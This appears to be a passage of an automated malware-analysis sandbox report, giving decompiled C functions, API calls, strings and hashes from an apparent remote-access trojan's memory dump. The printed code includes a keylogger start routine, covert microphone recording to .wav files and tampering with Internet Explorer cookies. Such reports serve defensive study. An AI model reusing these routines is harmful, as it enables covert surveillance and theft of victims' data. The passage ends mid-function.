						if(( *(E0043F3A5(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x46b800 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x46b800 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x46b800 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
							} else {
								_t112 = E00443630( &_v28, _t133, 2);
								_t137 = _t137 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E00443630();
						_t137 = _t137 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t135 = GetLastError();
								} else {
									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E0042FD1B(_v8 ^ _t136);
			}

0x00444b76
0x00444b7d
0x00444b80
0x00444b88
0x00444b8c
0x00444b98
0x00444b9b
0x00444b9e
0x00444ba5
0x00444bad
0x00444bb0
0x00444bb6
0x00444bbc
0x00444bc1
0x00444bc3
0x00444bc6
0x00444bcb
0x00444bd5
0x00444bdc
0x00444bdf
0x00444be6
0x00444bed
0x00444c19
0x00444c3f
0x00444c41
0x00000000
0x00444c1b
0x00444c1e
0x00444ce5
0x00444cf1
0x00444cfc
0x00444d01
0x00444c24
0x00444c2b
0x00444c30
0x00444c36
0x00444c3c
0x00000000
0x00444c3c
0x00444c36
0x00444c1e
0x00444bef
0x00444bf3
0x00444bf6
0x00444bfc
0x00444bfe
0x00444c01
0x00444c05
0x00444c42
0x00444c45
0x00444c46
0x00444c4b
0x00444c51
0x00444c57
0x00444c66
0x00444c6c
0x00444c72
0x00444c77
0x00444c93
0x00444d06
0x00444d0c
0x00444c95
0x00444c9d
0x00444ca6
0x00444cac
0x00000000
0x00444cae
0x00444cb0
0x00444cb3
0x00444ccc
0x00000000
0x00444cce
0x00444cd2
0x00444cd4
0x00444cd7
0x00000000
0x00444cd7
0x00444cd2
0x00444ccc
0x00444cac
0x00444ca6
0x00444c93
0x00444c77
0x00444c51
0x00000000
0x00444cda
0x00444cda
0x00444d0e
0x00444d20

APIs

GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,004452E3,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00444BB0
__fassign.LIBCMT ref: 00444C2B
__fassign.LIBCMT ref: 00444C46
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00444C6C
WriteFile.KERNEL32(?,FF8BC35D,00000000,004452E3,00000000,?,?,?,?,?,?,?,?,?,004452E3,?), ref: 00444C8B
WriteFile.KERNEL32(?,?,00000001,004452E3,00000000,?,?,?,?,?,?,?,?,?,004452E3,?), ref: 00444CC4

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 1988048004699f2f7593a450744e0e121896bcf0cc6bc31cfe112c82181f8df4
Instruction ID: e328608ab5ff3e249bba56c64f9ea87ddb18b4882b1b7872db0bfde0b7a2e7dd
Opcode Fuzzy Hash: 1988048004699f2f7593a450744e0e121896bcf0cc6bc31cfe112c82181f8df4
Instruction Fuzzy Hash: 4051B1B0E00249AFEB10CFA8D885BEEBBB8EF49304F14416BE555E7251E7349941CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00404FAD, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 112
timeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00404FAD(void* __edi, intOrPtr _a4) {
				struct _SYSTEMTIME _v24;
				char _v48;
				char _v72;
				void* __ebx;
				intOrPtr _t85;
				void* _t86;
				void* _t92;

				_t84 = __edi;
				if( *0x46c7d0 == 0) {
					__eflags = 0;
					return 0;
				}
				_t85 = _a4;
				if( *0x46bb03 == 0) {
					L7:
					 *0x46c7e0 =  *0x46c7e0 & 0x00000000;
					 *0x46c7e5 = 1;
					 *0x46c7dc = _t85;
					return 1;
				}
				_t91 =  *0x46c7e4;
				_t62 = "%02i:%02i:%02i:%03i [Info] ";
				if( *0x46c7e4 != 0) {
					GetLocalTime( &_v24);
					_push(_v24.wMilliseconds & 0x0000ffff);
					_push(_v24.wSecond & 0x0000ffff);
					_push(_v24.wMinute & 0x0000ffff);
					E0040482E(_t91, E00401F95(E00405343(_t62,  &_v48, E00402084("%02i:%02i:%02i:%03i [Info] ",  &_v72, _t62), __edi, _t91, "Connection KeepAlive enabled\n")), _v24.wHour & 0x0000ffff);
					E00401FC7();
					E00401FC7();
					_push(_t85);
					_push(_v24.wMilliseconds & 0x0000ffff);
					_push(_v24.wSecond & 0x0000ffff);
					_push(_v24.wMinute & 0x0000ffff);
					E0040482E(_t91, E00401F95(E00405343(_t62,  &_v72, E00402084(_t62,  &_v48, _t62), __edi, _t91, "Connection KeepAlive timeout: %i\n")), _v24.wHour & 0x0000ffff);
					_t86 = _t86 + 0x2c;
					E00401FC7();
					E00401FC7();
					 *0x46c7e4 = 0;
				}
				_t92 =  *0x46c7dc - _t85; // 0x14
				if(_t92 != 0) {
					_t93 =  *0x46c7e5;
					if( *0x46c7e5 != 0) {
						GetLocalTime( &_v24);
						_push(_t85);
						_push(_v24.wMilliseconds & 0x0000ffff);
						_push(_v24.wSecond & 0x0000ffff);
						_push(_v24.wMinute & 0x0000ffff);
						E0040482E(_t93, E00401F95(E00405343(_t62,  &_v72, E00402084(_t62,  &_v48, _t62), _t84, _t93, "KeepAlive timeout changed to %i\n")), _v24.wHour & 0x0000ffff);
						E00401FC7();
						E00401FC7();
					}
				}
				goto L7;
			}

0x00404fad
0x00404fbc
0x00405111
0x00000000
0x00405111
0x00404fc9
0x00404fcc
0x004050f9
0x004050f9
0x00405102
0x00405109
0x00000000
0x00405109
0x00404fd2
0x00404fd9
0x00404fde
0x00404fe8
0x00404ff5
0x00404ffa
0x00404fff
0x00405023
0x0040502e
0x00405036
0x00405042
0x00405043
0x00405048
0x0040504d
0x00405071
0x00405076
0x0040507c
0x00405084
0x00405089
0x00405089
0x00405090
0x00405096
0x00405098
0x0040509f
0x004050a5
0x004050b2
0x004050b3
0x004050b8
0x004050bd
0x004050e1
0x004050ec
0x004050f4
0x004050f4
0x0040509f
0x00000000

APIs

GetLocalTime.KERNEL32(004125A4,0046C780,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004125A4), ref: 00404FE8
GetLocalTime.KERNEL32(004125A4,0046C780,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004125A4), ref: 004050A5

Strings

Connection KeepAlive timeout: %i, xrefs: 00405053
Connection KeepAlive enabled, xrefs: 00405005
KeepAlive timeout changed to %i, xrefs: 004050C3
%02i:%02i:%02i:%03i [Info] , xrefs: 00404FD9, 0040500A, 00405058, 004050C8

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: LocalTime
String ID: %02i:%02i:%02i:%03i [Info] $Connection KeepAlive enabled$Connection KeepAlive timeout: %i$KeepAlive timeout changed to %i
API String ID: 481472006-2341810981
Opcode ID: 7c94642c56f54362cdbb9c4c99b137a64ebdc9c89d517faa3ec81877cd7e2248
Instruction ID: 31cc8708638748cc17bd93e98780a7eb41637df7a957a61141d383218a0d845e
Opcode Fuzzy Hash: 7c94642c56f54362cdbb9c4c99b137a64ebdc9c89d517faa3ec81877cd7e2248
Instruction Fuzzy Hash: 3B418762C00249AACB10F7A6D945AFFB7B8DB04309F10447BF941B60D2FB7C5A45DB69

Uniqueness

Uniqueness Score: -1.00%

Function 00401CEF, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00401CEF(void* __ebx, void* __edi, intOrPtr _a8) {
				char _v84;
				char _v112;
				void* _v116;
				char _v136;
				void* _v140;
				char _v160;
				void* _v164;
				char _v184;
				void* _v188;
				char _v204;
				char _v208;
				void* _v212;
				char _v228;
				char _v232;
				char _v236;
				void* __esi;
				void* _t29;
				intOrPtr _t43;
				void* _t75;

				_t47 = __ebx;
				_push(_t75);
				E00401F6D(__ebx,  &_v228);
				_t82 = _a8 - 0x3c0;
				if(_a8 == 0x3c0) {
					E004016F0();
					E004356B9( &_v84, 0x50, "%Y-%m-%d %H.%M", E004016E8());
					E00402084(__ebx,  &_v204,  &_v84);
					_t29 = E004172DA( &_v112,  &_v208);
					E00401EFA( &_v232, _t31, _t75, E004030A6(_t47,  &_v184, E00403030( &_v160, E00402FFA(__ebx,  &_v136, 0x46c0e0, 0x5c), _t29), __edi, _t82, L".wav"));
					E00401EF0();
					E00401EF0();
					E00401EF0();
					E00401EF0();
					E00401FC7();
					E00401A64(E00401EEB( &_v236), 0x46ba78);
					waveInUnprepareHeader( *0x46bab0, 0x46ba78, 0x20);
					0x46ba78->lpData = E00401F95(0x46c0f8);
					_t43 =  *0x46bab4; // 0x0
					 *0x46ba7c = _t43;
					 *0x46ba80 = 0;
					 *0x46ba84 = 0;
					 *0x46ba88 = 0;
					 *0x46ba8c = 0;
					waveInPrepareHeader( *0x46bab0, 0x46ba78, 0x20);
					waveInAddBuffer( *0x46bab0, 0x46ba78, 0x20);
				}
				return E00401EF0();
			}

0x00401cef
0x00401cff
0x00401d00
0x00401d05
0x00401d0c
0x00401d16
0x00401d34
0x00401d48
0x00401d5d
0x00401d91
0x00401d9a
0x00401da3
0x00401dac
0x00401db8
0x00401dc1
0x00401dd8
0x00401de6
0x00401df8
0x00401dfd
0x00401e09
0x00401e10
0x00401e15
0x00401e1a
0x00401e1f
0x00401e24
0x00401e33
0x00401e33
0x00401e46

APIs

_strftime.LIBCMT ref: 00401D34

Part of subcall function 00401A64: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401ACC

waveInUnprepareHeader.WINMM(0046BA78,00000020,00000000,?), ref: 00401DE6
waveInPrepareHeader.WINMM(0046BA78,00000020), ref: 00401E24
waveInAddBuffer.WINMM(0046BA78,00000020), ref: 00401E33

Strings

.wav, xrefs: 00401D4D
%Y-%m-%d %H.%M, xrefs: 00401D25

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
String ID: %Y-%m-%d %H.%M$.wav
API String ID: 3809562944-3597965672
Opcode ID: d3c10e846ecb8bea2605fde4a25610dab3d001097f6f1d0d1a9824d8bc590c67
Instruction ID: b95cf381b91ee3eea6b14a1bea0ab522a1d9d58dbc3f8f0b685b08f1e50e51ff
Opcode Fuzzy Hash: d3c10e846ecb8bea2605fde4a25610dab3d001097f6f1d0d1a9824d8bc590c67
Instruction Fuzzy Hash: 7131C2311043409BC314EF61DC46AAE77A9EB54308F00443EF85AA65F2FF789A49CB9E

Uniqueness

Uniqueness Score: -1.00%

Function 0040A409, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0040A409(void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v340;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t20;
				int _t34;
				void* _t40;
				void* _t41;
				char* _t42;
				void* _t48;
				char* _t55;
				void* _t59;
				void* _t61;
				void* _t62;

				_t42 =  &_v28;
				E004020D5(_t40, _t42);
				_push(_t42);
				_t41 = 0;
				_t17 = E004108E2( &_v52, 0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", "Cookies");
				_t62 = _t61 + 0xc;
				E00401FD1( &_v28, 0x80000001, _t59, _t17);
				E00401FC7();
				_t58 = 0x45f6bc;
				_t20 = E00405A6F(0x45f6bc);
				_t66 = _t20;
				if(_t20 == 0) {
					ExpandEnvironmentStringsA(E00401F95( &_v28),  &_v340, 0x104);
					__eflags = PathFileExistsA( &_v340);
					if(__eflags == 0) {
						goto L1;
					} else {
						E00402084(0,  &_v52,  &_v340);
						_t58 =  &_v52;
						_t34 = E00417754(E00401EEB(E004172DA( &_v76,  &_v52)));
						E00401EF0();
						_t55 =  &_v52;
						E00401FC7();
						__eflags = _t34;
						if(__eflags == 0) {
							_push(_t55);
							_push(_t55);
							__eflags = E0040A713();
							if(__eflags != 0) {
								_t41 = 1;
								E00402084(1, _t62 - 0x18, "\n[IE cookies cleared!]");
								E0040A6EF(1,  &_v52, __eflags);
								goto L8;
							}
						} else {
							_t48 = _t62 - 0x18;
							_push("\n[IE cookies cleared!]");
							goto L2;
						}
					}
				} else {
					L1:
					_t48 = _t62 - 0x18;
					_push("\n[IE cookies not found]");
					L2:
					E00402084(_t41, _t48);
					E0040A6EF(_t41, _t58, _t66);
					_t41 = 1;
					L8:
				}
				E00401FC7();
				return _t41;
			}

0x0040a412
0x0040a417
0x0040a41c
0x0040a42f
0x0040a431
0x0040a436
0x0040a43d
0x0040a445
0x0040a44a
0x0040a452
0x0040a457
0x0040a459
0x0040a48b
0x0040a49e
0x0040a4a0
0x00000000
0x0040a4a2
0x0040a4ac
0x0040a4b1
0x0040a4c5
0x0040a4cf
0x0040a4d4
0x0040a4d7
0x0040a4dc
0x0040a4de
0x0040a4ef
0x0040a4f0
0x0040a4f6
0x0040a4f8
0x0040a4fd
0x0040a506
0x0040a50b
0x00000000
0x0040a50b
0x0040a4e0
0x0040a4e3
0x0040a4e5
0x00000000
0x0040a4e5
0x0040a4de
0x0040a45b
0x0040a45b
0x0040a45e
0x0040a460
0x0040a465
0x0040a465
0x0040a46a
0x0040a46f
0x0040a510
0x0040a510
0x0040a516
0x0040a522

APIs

Part of subcall function 004108E2: RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,00000000,00000000), ref: 00410904
Part of subcall function 004108E2: RegQueryValueExA.KERNELBASE(00000000,?,00000000,00000000,?,00000400), ref: 00410923
Part of subcall function 004108E2: RegCloseKey.ADVAPI32(00000000), ref: 0041092C

ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040A48B
PathFileExistsA.SHLWAPI(?), ref: 0040A498

Strings

[IE cookies cleared!], xrefs: 0040A4E5, 0040A501
Cookies, xrefs: 0040A41D
[IE cookies not found], xrefs: 0040A460
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, xrefs: 0040A422

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
API String ID: 1133728706-4073444585
Opcode ID: 724a0fe27f4f6489b78bfe97240ea4b5cf9d33245695f08732568f9e26d24ae0
Instruction ID: 0404135b92c53f53d421c2624bcb9c4f004ba22d2f22d8914b52eea1ab551b62
Opcode Fuzzy Hash: 724a0fe27f4f6489b78bfe97240ea4b5cf9d33245695f08732568f9e26d24ae0
Instruction Fuzzy Hash: D0218E31A102056ACB14F7F1CC5B9EE7768AF14309F44013EF901B71D3EA799A598A9A

Uniqueness

Uniqueness Score: -1.00%

Function 004501D3, Relevance: 10.6, APIs: 7, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E004501D3(char* _a4, short* _a8) {
				int _v8;
				void* __ecx;
				void* __esi;
				short* _t10;
				short* _t14;
				int _t15;
				short* _t16;
				void* _t26;
				int _t27;
				void* _t29;
				short* _t35;
				short* _t39;
				short* _t40;

				_push(_t29);
				if(_a4 != 0) {
					_t39 = _a8;
					__eflags = _t39;
					if(__eflags != 0) {
						_push(_t26);
						E004420AE(_t29, _t39, __eflags);
						asm("sbb ebx, ebx");
						_t35 = 0;
						_t27 = _t26 + 1;
						 *_t39 = 0;
						_t10 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, 0, 0);
						_v8 = _t10;
						__eflags = _t10;
						if(_t10 != 0) {
							_t40 = E0043F98C(_t29, _t10 + _t10);
							__eflags = _t40;
							if(_t40 != 0) {
								_t15 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, _t40, _v8);
								__eflags = _t15;
								if(_t15 != 0) {
									_t16 = _t40;
									_t40 = 0;
									_t35 = 1;
									__eflags = 1;
									 *_a8 = _t16;
								} else {
									E0043A4CE(GetLastError());
								}
							}
							E004401F5(_t40);
							_t14 = _t35;
						} else {
							E0043A4CE(GetLastError());
							_t14 = 0;
						}
					} else {
						 *((intOrPtr*)(E0043A504())) = 0x16;
						E0043695D();
						_t14 = 0;
					}
					return _t14;
				}
				 *((intOrPtr*)(E0043A504())) = 0x16;
				E0043695D();
				return 0;
			}

0x004501d8
0x004501dd
0x004501f7
0x004501fa
0x004501fc
0x00450215
0x00450217
0x0045021e
0x00450220
0x00450229
0x0045022a
0x0045022e
0x00450234
0x00450237
0x00450239
0x00450253
0x00450256
0x00450258
0x00450265
0x0045026b
0x0045026d
0x00450281
0x00450283
0x00450287
0x00450287
0x00450288
0x0045026f
0x00450276
0x0045027b
0x0045026d
0x0045028b
0x00450290
0x0045023b
0x00450242
0x00450247
0x00450247
0x004501fe
0x00450203
0x00450209
0x0045020e
0x0045020e
0x00000000
0x00450295
0x004501e4
0x004501ea
0x00000000

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03f5aa3418e858ee643f474f580926e5b9a5c2813f3d30507152f14f29747a58
Instruction ID: 3e8c339fdf138c944f03ee87ae81e8163027b6b6686a5aa70f35362f2fa299d2
Opcode Fuzzy Hash: 03f5aa3418e858ee643f474f580926e5b9a5c2813f3d30507152f14f29747a58
Instruction Fuzzy Hash: B5113D765002157BDB206F729C0D92B7AACDF86762F1046ABFC19C7242DA3CCC05C679

Uniqueness

Uniqueness Score: -1.00%

Function 0040E7E5, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040E7E5(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				void* _v8;
				char _v12;
				char _v24;
				void* __esi;
				intOrPtr _t40;
				void* _t48;
				intOrPtr* _t51;

				E00430058( &_v12, 0);
				_t48 =  *0x46db84;
				_v8 = _t48;
				_t51 = E0040BA23(_a4, E0040B94C(0x46b130));
				if(_t51 != 0) {
					L5:
					E004300B0( &_v12);
					return _t51;
				} else {
					if(_t48 == 0) {
						__eflags = E0040BB55(__ebx, __edx,  &_v8, _a4) - 0xffffffff;
						if(__eflags == 0) {
							E0040B812( &_v24);
							E0043205A( &_v24, 0x46864c);
							asm("int3");
							_t40 =  *((intOrPtr*)( *[fs:0x2c]));
							__eflags =  *0x46db78 -  *((intOrPtr*)(_t40 + 4));
							if( *0x46db78 >  *((intOrPtr*)(_t40 + 4))) {
								_push(_t51);
								E0042F114(0x46db78);
								__eflags =  *0x46db78 - 0xffffffff;
								if( *0x46db78 == 0xffffffff) {
									E0040EB9C();
									E0042F49E(__eflags, 0x452871);
									E0042F0D5(0x46db78, 0x46db78);
								}
							}
							return 0x46db7c;
						} else {
							_t51 = _v8;
							 *0x46db84 = _t51;
							 *((intOrPtr*)( *_t51 + 4))();
							E00430269(__eflags, _t51);
							goto L5;
						}
					} else {
						_t51 = _t48;
						goto L5;
					}
				}
			}

0x0040e7f2
0x0040e7f7
0x0040e802
0x0040e813
0x0040e817
0x0040e84b
0x0040e84e
0x0040e85a
0x0040e819
0x0040e81b
0x0040e82f
0x0040e832
0x0040e85e
0x0040e86c
0x0040e871
0x0040e878
0x0040e87f
0x0040e885
0x0040e887
0x0040e88e
0x0040e893
0x0040e89b
0x0040e89d
0x0040e8a7
0x0040e8ad
0x0040e8b3
0x0040e8b4
0x0040e8ba
0x0040e834
0x0040e834
0x0040e839
0x0040e841
0x0040e845
0x00000000
0x0040e84a
0x0040e81d
0x0040e81d
0x00000000
0x0040e81d
0x0040e81b

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040E7F2
int.LIBCPMT ref: 0040E805

Part of subcall function 0040B94C: std::_Lockit::_Lockit.LIBCPMT ref: 0040B95D
Part of subcall function 0040B94C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040B977

std::locale::_Getfacet.LIBCPMT ref: 0040E80E
std::_Facet_Register.LIBCPMT ref: 0040E845
std::_Lockit::~_Lockit.LIBCPMT ref: 0040E84E
__CxxThrowException@8.LIBVCRUNTIME ref: 0040E86C
__Init_thread_footer.LIBCMT ref: 0040E8AD

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetInit_thread_footerRegisterThrowstd::locale::_
String ID:
API String ID: 2409581025-0
Opcode ID: e7a0018a1746f9c7bf4673166abd77dce41b100f788e83672023b9d031f69d2e
Instruction ID: 03fd642756e00294ec4acf8aadaa37b4638c280f2e7f5516d862d72f379d1b29
Opcode Fuzzy Hash: e7a0018a1746f9c7bf4673166abd77dce41b100f788e83672023b9d031f69d2e
Instruction Fuzzy Hash: 7C21D332E001149BC714FB69D906A9E77B8DB44724B60417FE800B72D2EB78AD01879E

Uniqueness

Uniqueness Score: -1.00%

Function 00409634, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 74
timeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00409634(void* __ebx, void* __ecx, void* __eflags, char _a4) {
				struct _SYSTEMTIME _v20;
				char _v44;
				char _v68;
				void* __edi;
				void* __esi;
				WCHAR* _t33;
				void* _t65;
				void* _t67;
				void* _t70;

				_t70 = __eflags;
				_t42 = __ebx;
				_t67 = __ecx;
				GetLocalTime( &_v20);
				E00401EFA( &_a4, _t26, _t67, E004030A6(__ebx,  &_v44, E00409E69( &_v68, L"\r\n[%04i/%02i/%02i %02i:%02i:%02i ", _t70,  &_a4), _t65, _t70, L"]\r\n"));
				E00401EF0();
				E00401EF0();
				_push(0x64 + E00402489() * 2);
				_t33 = E004394F6( &_a4);
				_t66 = _t33;
				_push(_v20.wSecond & 0x0000ffff);
				_push(_v20.wMinute & 0x0000ffff);
				_push(_v20.wHour & 0x0000ffff);
				_push(_v20.wDay & 0x0000ffff);
				_push(_v20.wMonth & 0x0000ffff);
				_push(_v20.wYear & 0x0000ffff);
				wsprintfW(_t33, E00401EEB( &_a4));
				if( *((char*)(_t67 + 0x49)) != 0) {
					E0040766C(__ebx, _t67 + 4, _t66, _t66);
				}
				if( *((char*)(_t67 + 0x4a)) != 0) {
					E0040766C(_t42, _t67 + 0x1c, _t66, _t66);
					SetEvent( *(_t67 + 0x3c));
				}
				L004394F1(_t66);
				return E00401EF0();
			}

0x00409634
0x00409634
0x0040963f
0x00409642
0x0040966e
0x00409676
0x0040967e
0x00409692
0x00409693
0x0040969d
0x004096a3
0x004096a8
0x004096ad
0x004096b2
0x004096b7
0x004096b8
0x004096c3
0x004096d0
0x004096d6
0x004096d6
0x004096df
0x004096e5
0x004096ed
0x004096ed
0x004096f4
0x00409707

APIs

GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 00409642

Part of subcall function 00409E69: char_traits.LIBCPMT ref: 00409E79

wsprintfW.USER32 ref: 004096C3
SetEvent.KERNEL32(?,00000000), ref: 004096ED

Strings

Offline Keylogger Started, xrefs: 0040963B
[%04i/%02i/%02i %02i:%02i:%02i , xrefs: 0040964B
], xrefs: 00409650

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: EventLocalTimechar_traitswsprintf
String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
API String ID: 3003339404-248792730
Opcode ID: c6fa71370f96352e3d1fd7127862656f83fd8a9c7cdc59eaf0d99a36eee52d65
Instruction ID: dd13208d924f003fd79d0c2a63de2e9b71645c7df6fae77663c0b624719a6389
Opcode Fuzzy Hash: c6fa71370f96352e3d1fd7127862656f83fd8a9c7cdc59eaf0d99a36eee52d65
Instruction Fuzzy Hash: 7021A4724001186AC728EBA5EC958FF77B9AF08355F00413FF847621D2EE78AA45D768

Uniqueness

Uniqueness Score: -1.00%

Function 00416F19, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71
sleeplibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E00416F19(void* __edx) {
				intOrPtr _v8;
				char _v12;
				char _v20;
				char _v28;
				char _v36;
				char _v44;
				char _v52;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t29;
				void* _t30;
				void* _t40;
				intOrPtr* _t44;

				_t40 = __edx;
				_t44 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetSystemTimes");
				 *_t44( &_v52,  &_v28,  &_v20);
				Sleep(0x3e8);
				 *_t44( &_v44,  &_v36,  &_v12);
				_t25 = E00416FCE( &_v12);
				_t26 = E00416FCE( &_v20);
				asm("sbb ebx, edx");
				_t27 = E00416FCE( &_v28);
				asm("sbb ebx, edx");
				_v8 = _t25 - _t26 - _t27 + E00416FCE( &_v36);
				asm("adc ebx, edx");
				_t29 = E00416FCE( &_v44);
				asm("sbb esi, edx");
				_t30 = E00416FCE( &_v52);
				asm("adc esi, edx");
				return E00450880(E00450840(_t25 - _t26 - _t27 + E00416FCE( &_v36) - _t29 + _t30, _t40, 0x64, 0), _t40, _v8, _t40);
			}

0x00416f19
0x00416f39
0x00416f47
0x00416f4e
0x00416f60
0x00416f65
0x00416f71
0x00416f7b
0x00416f7d
0x00416f87
0x00416f93
0x00416f96
0x00416f98
0x00416fa6
0x00416fa8
0x00416fb3
0x00416fcd

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,0046BACC,?,?,?,?,?,?,?,?,?,?,?,004135C0), ref: 00416F2C
GetProcAddress.KERNEL32(00000000), ref: 00416F33
Sleep.KERNEL32(000003E8,?,0046BACC,?,?,?,?,?,?,?,?,?,?,?,004135C0,00000095), ref: 00416F4E
__aulldiv.LIBCMT ref: 00416FC2

Strings

GetSystemTimes, xrefs: 00416F22
kernel32.dll, xrefs: 00416F27

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddressHandleModuleProcSleep__aulldiv
String ID: GetSystemTimes$kernel32.dll
API String ID: 482274533-1354958348
Opcode ID: b7bf844ce0dfb244a469c2aba271e743374f701500a0765d18e98eef1d7050f3
Instruction ID: 018d20e96d693e42a87ad15873a94ebdad9b14d36b0451d32c6181a8858f91cb
Opcode Fuzzy Hash: b7bf844ce0dfb244a469c2aba271e743374f701500a0765d18e98eef1d7050f3
Instruction Fuzzy Hash: 89118477D002286BCB14EBF5DC85DEFBB7CAB44755F05063AF905E3141ED389A4886A4

Uniqueness

Uniqueness Score: -1.00%

Function 105D9FE8, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E105D9FE8(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E105D9D2F(_t45, 7);
					E105D9D2F(_t45 + 0x1c, 7);
					E105D9D2F(_t45 + 0x38, 0xc);
					E105D9D2F(_t45 + 0x68, 0xc);
					E105D9D2F(_t45 + 0x98, 2);
					E105D1063( *((intOrPtr*)(_t45 + 0xa0)));
